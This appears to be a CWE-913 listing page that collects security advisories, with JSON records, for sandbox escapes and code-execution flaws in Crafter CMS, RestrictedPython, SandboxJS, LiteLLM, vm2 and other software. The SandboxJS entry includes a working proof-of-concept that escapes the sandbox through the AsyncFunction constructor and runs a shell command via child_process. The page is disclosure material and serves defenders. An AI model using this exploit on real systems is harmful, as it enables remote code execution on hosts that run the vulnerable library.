Common Weakness Enumeration

CWE-913

Allowed-with-Review

Improper Control of Dynamically-Managed Code Resources

Abstraction: Class · Status: Incomplete

The product does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements.

159 vulnerabilities reference this CWE, most recent first.

GHSA-WQ3V-3GRQ-6F86

Vulnerability from github – Published: 2022-02-09 23:07 – Updated: 2021-04-13 18:25
VLAI
Summary
Improper Control of Dynamically-Managed Code Resources in Crafter CMS Crafter Studio
Details

Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via Groovy scripting. This issue affects: Crafter Software Crafter CMS 3.0 versions prior to 3.0.27; 3.1 versions prior to 3.1.7.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.craftercms:crafter-studio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0"
            },
            {
              "fixed": "3.0.27"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.craftercms:crafter-studio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.1"
            },
            {
              "fixed": "3.1.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-25802"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-13T18:25:38Z",
    "nvd_published_at": "2020-10-06T14:15:00Z",
    "severity": "HIGH"
  },
  "details": "Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via Groovy scripting. This issue affects: Crafter Software Crafter CMS 3.0 versions prior to 3.0.27; 3.1 versions prior to 3.1.7.",
  "id": "GHSA-wq3v-3grq-6f86",
  "modified": "2021-04-13T18:25:38Z",
  "published": "2022-02-09T23:07:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25802"
    },
    {
      "type": "WEB",
      "url": "https://docs.craftercms.org/en/3.1/security/advisory.html#cv-2020080101"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Improper Control of Dynamically-Managed Code Resources in Crafter CMS Crafter Studio"
}

GHSA-WQC8-X2PR-7JQH

Vulnerability from github – Published: 2023-07-10 21:53 – Updated: 2023-07-11 19:40
VLAI
Summary
RestrictedPython vulnerable to arbitrary code execution via stack frame sandbox escape
Details

Impact

RestrictedPython does not check access to stack frames and their attributes. Stack frames are accessible within at least generators and generator expressions, which are allowed inside RestrictedPython. An attacker with access to a RestrictedPython environment can write code that gets the current stack frame in a generator and then walk the stack all the way beyond the RestrictedPython invocation boundary, thus breaking out of the restricted scope allowing the call of unrestricted Python code and therefore potentially allowing arbitrary code execution in the Python interpreter.

All RestrictedPython deployments that allow untrusted users to write Python code in the RestrictedPython environment are at risk. In terms of Zope and Plone, this would mean deployments where the administrator allows untrusted users to create and/or edit objects of type Script (Python), DTML Method, DTML Document or Zope Page Template. This is a non-default configuration and likely to be extremely rare.

Patches

The problem has been fixed in releases 5.3 and 6.1.

Workarounds

There is no workaround available. If you cannot upgrade to the latest release you should ensure the RestrictedPython environment is only available for trusted users.

References

For more information

If you have any questions or comments about this advisory:

Credits

Thanks for analysing and reporting the go to: - Nakul Choudhary (Quasar0147 on GitHub) - despawningbone on GitHub - Robert Xiao (nneonneo on GitHub)

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "RestrictedPython"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "RestrictedPython"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0a1.dev0"
            },
            {
              "fixed": "6.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "restrictedpython"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-37271"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-07-10T21:53:22Z",
    "nvd_published_at": "2023-07-11T18:15:20Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nRestrictedPython does not check access to stack frames and their attributes. Stack frames are accessible within at least generators and generator expressions, which are allowed inside RestrictedPython. An attacker with access to a RestrictedPython environment can write code that gets the current stack frame in a generator and then walk the stack all the way beyond the RestrictedPython invocation boundary, thus breaking out of the restricted scope allowing the call of unrestricted Python code and therefore potentially allowing arbitrary code execution in the Python interpreter.\n\nAll RestrictedPython deployments that allow untrusted users to write Python code in the RestrictedPython environment are at risk. In terms of Zope and Plone, this would mean deployments where the administrator allows untrusted users to create and/or edit objects of type `Script (Python)`, `DTML Method`, `DTML Document` or `Zope Page Template`. This is a non-default configuration and likely to be extremely rare.\n\n### Patches\n\nThe problem has been fixed in releases 5.3 and 6.1.\n\n### Workarounds\n\nThere is no workaround available. If you cannot upgrade to the latest release you should ensure the RestrictedPython environment is only available for trusted users.\n\n### References\n\n- [RestrictedPython security advisory GHSA-wqc8-x2pr-7jqh](https://github.com/zopefoundation/RestrictedPython/security/advisories/GHSA-wqc8-x2pr-7jqh)\n\n## For more information\n\nIf you have any questions or comments about this advisory:\n\n- Open an issue in the [RestrictedPython issue tracker](https://github.com/zopefoundation/RestrictedPython/issues)\n- Email us at [security@plone.org](mailto:security@plone.org)\n\n## Credits\n\nThanks for analysing and reporting the go to:\n- Nakul Choudhary (Quasar0147 on GitHub)\n- despawningbone on GitHub\n- Robert Xiao (nneonneo on GitHub)",
  "id": "GHSA-wqc8-x2pr-7jqh",
  "modified": "2023-07-11T19:40:20Z",
  "published": "2023-07-10T21:53:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/zopefoundation/RestrictedPython/security/advisories/GHSA-wqc8-x2pr-7jqh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37271"
    },
    {
      "type": "WEB",
      "url": "https://github.com/zopefoundation/RestrictedPython/commit/c8eca66ae49081f0016d2e1f094c3d72095ef531"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/restrictedpython/PYSEC-2023-118.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/zopefoundation/RestrictedPython"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "RestrictedPython vulnerable to arbitrary code execution via stack frame sandbox escape"
}

GHSA-WXHW-J4HC-FMQ6

Vulnerability from github – Published: 2026-01-27 19:55 – Updated: 2026-01-29 03:43
VLAI
Summary
SandboxJS has Sandbox Escape via Unprotected AsyncFunction Constructor
Details

Summary

A sandbox escape vulnerability due to AsyncFunction not being isolated in SandboxFunction

Details

The library attempts to sandbox code execution by replacing the global Function constructor with a safe, sandboxed version (SandboxFunction). This is handled in utils.ts by mapping Function to sandboxFunction within a map used for lookups.

However, the library did not include mappings for AsyncFunction, GeneratorFunction, and AsyncGeneratorFunction. These constructors are not global properties but can be accessed via the .constructor property of an instance (e.g., (async () => {}).constructor).

In executor.ts, property access is handled. When code running inside the sandbox accesses .constructor on an async function (which the sandbox allows creating), the executor retrieves the property value. Since AsyncFunction was not in the safe-replacement map, the executor returns the actual native host AsyncFunction constructor.

Constructors for functions in JavaScript (like Function, AsyncFunction) create functions that execute in the global scope. By obtaining the host AsyncFunction constructor, an attacker can create a new async function that executes entirely outside the sandbox context, bypassing all restrictions and gaining full access to the host environment (Remote Code Execution).

PoC

const sandbox = require('@nyariv/sandboxjs');
const s = new sandbox.default();

const payload = `
    const af = async () => {};
    // .constructor returns the host AsyncFunction constructor because it's not intercepted
    const AsyncConstructor = af.constructor;
    console.log("AsyncConstructor name:", AsyncConstructor.name);

    // Create a function that executes outside the sandbox
    const func = AsyncConstructor("return process.mainModule.require('child_process').execSync('id').toString()");

    // Execute RCE
    const p = func();
    p.then(proc => {
        console.log(proc);
    });
`;

try {
    s.compile(payload)().run();
} catch (e) {
    console.error("Bypass failed:", e.message);
}

Run above script in nodejs. If you run it in browser, change the AsyncConstructor argument by returning window object.

Impact

A Remote Code Execution, attacker may be able to run an arbitrary code.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nyariv/sandboxjs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.26"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-23830"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-693",
      "CWE-913",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-27T19:55:11Z",
    "nvd_published_at": "2026-01-28T00:15:50Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nA sandbox escape vulnerability due to `AsyncFunction` not being isolated in `SandboxFunction`\n\n### Details\n\nThe library attempts to sandbox code execution by replacing the global `Function` constructor with a safe, sandboxed version (`SandboxFunction`). This is handled in `utils.ts` by mapping `Function` to `sandboxFunction` within a map used for lookups.\n\nHowever, the library did not include mappings for `AsyncFunction`, `GeneratorFunction`, and `AsyncGeneratorFunction`. These constructors are not global properties but can be accessed via the `.constructor` property of an instance (e.g., `(async () =\u003e {}).constructor`).\n\nIn `executor.ts`, property access is handled. When code running inside the sandbox accesses `.constructor` on an async function (which the sandbox allows creating), the `executor` retrieves the property value. Since `AsyncFunction` was not in the safe-replacement map, the `executor` returns the actual native host `AsyncFunction` constructor.\n\nConstructors for functions in JavaScript (like `Function`, `AsyncFunction`) create functions that execute in the global scope. By obtaining the host `AsyncFunction` constructor, an attacker can create a new async function that executes entirely outside the sandbox context, bypassing all restrictions and gaining full access to the host environment (Remote Code Execution).\n\n### PoC\n\n```js\nconst sandbox = require(\u0027@nyariv/sandboxjs\u0027);\nconst s = new sandbox.default();\n\nconst payload = `\n    const af = async () =\u003e {};\n    // .constructor returns the host AsyncFunction constructor because it\u0027s not intercepted\n    const AsyncConstructor = af.constructor;\n    console.log(\"AsyncConstructor name:\", AsyncConstructor.name);\n    \n    // Create a function that executes outside the sandbox\n    const func = AsyncConstructor(\"return process.mainModule.require(\u0027child_process\u0027).execSync(\u0027id\u0027).toString()\");\n    \n    // Execute RCE\n    const p = func();\n    p.then(proc =\u003e {\n        console.log(proc);\n    });\n`;\n\ntry {\n    s.compile(payload)().run();\n} catch (e) {\n    console.error(\"Bypass failed:\", e.message);\n}\n```\n\nRun above script in nodejs. If you run it in browser, change the `AsyncConstructor` argument by returning `window` object. \n\n### Impact\n\nA Remote Code Execution, attacker may be able to run an arbitrary code.",
  "id": "GHSA-wxhw-j4hc-fmq6",
  "modified": "2026-01-29T03:43:42Z",
  "published": "2026-01-27T19:55:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-wxhw-j4hc-fmq6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23830"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nyariv/SandboxJS/commit/345aee6566e47979dee5c337b925b141e7f78ccd"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nyariv/SandboxJS"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SandboxJS has Sandbox Escape via Unprotected AsyncFunction Constructor"
}

GHSA-WXXX-GVQV-XP7P

Vulnerability from github – Published: 2026-05-11 16:17 – Updated: 2026-05-11 16:17
VLAI
Summary
LiteLLM has a sandbox escape in custom-code guardrail
Details

Impact

The POST /guardrails/test_custom_code endpoint runs user-supplied Python inside a hand-rolled sandbox. The sandbox can be escaped using bytecode-level techniques, allowing arbitrary code execution in the proxy process — which runs as root in the default Docker image.

Reaching the endpoint requires a proxy-admin credential in default configurations.

Patches

Fixed in 1.83.11. The hand-rolled sandbox has been replaced with RestrictedPython. Upgrade to 1.83.11 or later.

Workarounds

If upgrading is not immediately possible, block POST /guardrails/test_custom_code at your reverse proxy or API gateway.

References

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "litellm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.81.8"
            },
            {
              "fixed": "1.83.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40217"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-420",
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T16:17:23Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Impact\n\nThe `POST /guardrails/test_custom_code` endpoint runs user-supplied Python inside a hand-rolled sandbox. The sandbox can be escaped using bytecode-level techniques, allowing arbitrary code execution in the proxy process \u2014 which runs as root in the default Docker image.\n\n**Reaching the endpoint requires a proxy-admin credential** in default configurations.\n\n### Patches\n\nFixed in **`1.83.11`**. The hand-rolled sandbox has been replaced with `RestrictedPython`. Upgrade to `1.83.11` or later.\n\n### Workarounds\n\nIf upgrading is not immediately possible, block `POST /guardrails/test_custom_code` at your reverse proxy or API gateway.\n\n### References\n\n- Patched release: [`v1.83.10-stable`](https://github.com/BerriAI/litellm/releases/tag/v1.83.10-stable)",
  "id": "GHSA-wxxx-gvqv-xp7p",
  "modified": "2026-05-11T16:17:23Z",
  "published": "2026-05-11T16:17:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/BerriAI/litellm/security/advisories/GHSA-wxxx-gvqv-xp7p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40217"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/BerriAI/litellm"
    },
    {
      "type": "WEB",
      "url": "https://github.com/BerriAI/litellm/releases/tag/v1.83.10-stable"
    },
    {
      "type": "WEB",
      "url": "https://www.x41-dsec.de/lab/advisories/x41-2026-001-litellm"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "LiteLLM has a sandbox escape in custom-code guardrail"
}

GHSA-X732-F4PC-FF5P

Vulnerability from github – Published: 2022-05-13 01:31 – Updated: 2022-05-13 01:31
VLAI
Details

A vulnerability in the Fibre Channel over Ethernet (FCoE) N-port Virtualization (NPV) protocol implementation in Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition. The vulnerability is due to an incorrect processing of FCoE packets when the fcoe-npv feature is uninstalled. An attacker could exploit this vulnerability by sending a stream of FCoE frames from an adjacent host to an affected device. An exploit could allow the attacker to cause packet amplification to occur, resulting in the saturation of interfaces and a DoS condition. Nexus 9000 Series Switches in Standalone NX-OS Mode are affected running software versions prior to 7.0(3)I7(5) and 9.2(2).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-1617"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-03-11T21:29:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in the Fibre Channel over Ethernet (FCoE) N-port Virtualization (NPV) protocol implementation in Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition. The vulnerability is due to an incorrect processing of FCoE packets when the fcoe-npv feature is uninstalled. An attacker could exploit this vulnerability by sending a stream of FCoE frames from an adjacent host to an affected device. An exploit could allow the attacker to cause packet amplification to occur, resulting in the saturation of interfaces and a DoS condition. Nexus 9000 Series Switches in Standalone NX-OS Mode are affected running software versions prior to 7.0(3)I7(5) and 9.2(2).",
  "id": "GHSA-x732-f4pc-ff5p",
  "modified": "2022-05-13T01:31:30Z",
  "published": "2022-05-13T01:31:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1617"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190306-nxos-npv-dos"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/107336"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X92G-49GH-63QM

Vulnerability from github – Published: 2022-09-17 00:00 – Updated: 2026-02-27 20:47
VLAI
Summary
Budibase Improper Control of Dynamically-Managed Code Resources vulnerability
Details

Improper Control of Dynamically-Managed Code Resources in GitHub repository budibase/budibase prior to 1.3.20.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@budibase/worker"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.3.20"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@budibase/builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.3.20"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@budibase/bbui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.3.20"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-3225"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-08-03T16:41:39Z",
    "nvd_published_at": "2022-09-16T17:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Improper Control of Dynamically-Managed Code Resources in GitHub repository budibase/budibase prior to 1.3.20.",
  "id": "GHSA-x92g-49gh-63qm",
  "modified": "2026-02-27T20:47:54Z",
  "published": "2022-09-17T00:00:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3225"
    },
    {
      "type": "WEB",
      "url": "https://github.com/budibase/budibase/commit/d35864be0854216693a01307f81ffcabf6d549df"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/releases/tag/v1.3.20"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/budibase/budibase"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/a13a56b7-04da-4560-b8ec-0d637d12a245"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Budibase Improper Control of Dynamically-Managed Code Resources vulnerability"
}

GHSA-XGPM-XF5G-45M5

Vulnerability from github – Published: 2025-12-05 15:30 – Updated: 2025-12-05 15:30
VLAI
Details

A vulnerability has been found in youlaitech youlai-mall 1.0.0/2.0.0. This impacts an unknown function of the file /app-api/v1/orders/. The manipulation of the argument orderId leads to improper control of dynamically-identified variables. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-14085"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-05T14:15:48Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been found in youlaitech youlai-mall 1.0.0/2.0.0. This impacts an unknown function of the file /app-api/v1/orders/. The manipulation of the argument orderId leads to improper control of dynamically-identified variables. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-xgpm-xf5g-45m5",
  "modified": "2025-12-05T15:30:26Z",
  "published": "2025-12-05T15:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14085"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Hwwg/cve/issues/23"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.334476"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.334476"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.695943"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XH7P-RGF9-78JV

Vulnerability from github – Published: 2025-07-08 09:31 – Updated: 2025-07-08 09:31
VLAI
Details

An unauthenticated remote attacker can alter the device configuration in a way to get remote code execution as root with specific configurations.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-25270"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-08T07:15:25Z",
    "severity": "CRITICAL"
  },
  "details": "An unauthenticated remote attacker can alter the device configuration in a way to get remote code execution as root with specific configurations.",
  "id": "GHSA-xh7p-rgf9-78jv",
  "modified": "2025-07-08T09:31:29Z",
  "published": "2025-07-08T09:31:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25270"
    },
    {
      "type": "WEB",
      "url": "https://certvde.com/de/advisories/VDE-2025-019"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XJ72-WVFV-8985

Vulnerability from github – Published: 2023-04-12 20:42 – Updated: 2023-04-14 21:35
VLAI
Summary
vm2 Sandbox Escape vulnerability
Details

There exists a vulnerability in source code transformer (exception sanitization logic) of vm2 for versions up to 3.9.15, allowing attackers to bypass handleException() and leak unsanitized host exceptions which can be used to escape the sandbox and run arbitrary code in host context.

Impact

A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.

Patches

This vulnerability was patched in the release of version 3.9.16 of vm2.

Workarounds

None.

References

Github Issue - https://github.com/patriksimek/vm2/issues/516 PoC - https://gist.github.com/leesh3288/f05730165799bf56d70391f3d9ea187c

For more information

If you have any questions or comments about this advisory:

  • Open an issue in VM2

Thanks to Xion (SeungHyun Lee) of KAIST Hacking Lab for disclosing this vulnerability.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "vm2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.9.16"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-29199"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-04-12T20:42:44Z",
    "nvd_published_at": "2023-04-14T19:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "There exists a vulnerability in source code transformer (exception sanitization logic) of vm2 for versions up to 3.9.15, allowing attackers to bypass `handleException()` and leak unsanitized host exceptions which can be used to escape the sandbox and run arbitrary code in host context.\n\n### Impact\nA threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.\n\n### Patches\nThis vulnerability was patched in the release of version `3.9.16` of `vm2`.\n\n### Workarounds\nNone.\n\n### References\nGithub Issue - https://github.com/patriksimek/vm2/issues/516\nPoC - https://gist.github.com/leesh3288/f05730165799bf56d70391f3d9ea187c\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n- Open an issue in [VM2](https://github.com/patriksimek/vm2)\n\nThanks to [Xion](https://twitter.com/0x10n) (SeungHyun Lee) of [KAIST Hacking Lab](https://kaist-hacking.github.io/) for disclosing this vulnerability.",
  "id": "GHSA-xj72-wvfv-8985",
  "modified": "2023-04-14T21:35:01Z",
  "published": "2023-04-12T20:42:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-xj72-wvfv-8985"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29199"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/issues/516"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/commit/24c724daa7c09f003e556d7cd1c7a8381cb985d7"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/leesh3288/f05730165799bf56d70391f3d9ea187c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/patriksimek/vm2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/patriksimek/vm2/releases/tag/3.9.16"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vm2 Sandbox Escape vulnerability"
}

Mitigation
Implementation

Strategy: Input Validation

For any externally-influenced input, check the input against an allowlist of acceptable values.

Mitigation
Implementation Architecture and Design

Strategy: Refactoring

Refactor the code so that it does not need to be dynamically managed.

No CAPEC attack patterns related to this CWE.